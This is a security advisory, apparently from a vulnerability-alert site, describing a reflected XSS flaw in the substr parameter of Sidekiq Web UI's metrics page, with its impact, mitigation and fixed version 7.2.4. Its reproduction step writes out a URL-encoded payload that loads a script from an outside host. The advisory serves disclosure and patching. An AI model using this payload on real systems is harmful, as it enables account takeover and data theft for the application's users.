First published: Fri Apr 26 2024(Updated: )
### Description: During the source Code Review of the metrics.erb view of the Sidekiq Web UI, A reflected XSS vulnerability is discovered. The value of substr parameter is reflected in the response without any encoding, allowing an attacker to inject Javascript code into the response of the application. This vulnerability can be exploited to target the users of the application, and users of other applications deployed on the same domain or website as that of the Sidekiq website. Successful exploit results may result in compromise of user accounts and user data. ### Impact: The impact of this vulnerability can be severe. An attacker could exploit it to target users of the Sidekiq Web UI. Moreover, if other applications are deployed on the same domain or website as Sidekiq, users of those applications could also be affected, leading to a broader scope of compromise. Potentially compromising their accounts, forcing the users to perform sensitive actions, stealing sensitive data, performing CORS attacks, defacement of the web application, etc. ### Mitigation: Encode all output data before rendering it in the response to prevent XSS attacks. ### Steps to Reproduce: 1. Go to the following URL of the sidekiq Web UI: https://{host}/sidekiq/metrics?substr=beret%22%3E%3Cscript%20src=%22https://cheemahq.vercel.app/a.js%22%20/%3E 2. XSS payload will be executed, causing a popup. ### Evidence: ![image](https://github.com/sidekiq/sidekiq/assets/59286712/9b7efa06-60bc-4d72-bb37-c5949154827e) Figure 1: Source Code Vulnerable to XSS ![image](https://github.com/sidekiq/sidekiq/assets/59286712/7a801feb-d495-416e-8e0e-36dee0eadf85) Figure 2: XSS payload triggered
Credit: security-advisories@github.com security-advisories@github.com
Affected Software | Affected Version | How to fix |
---|---|---|
rubygems/sidekiq | >=7.2.0<7.2.4 | 7.2.4 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.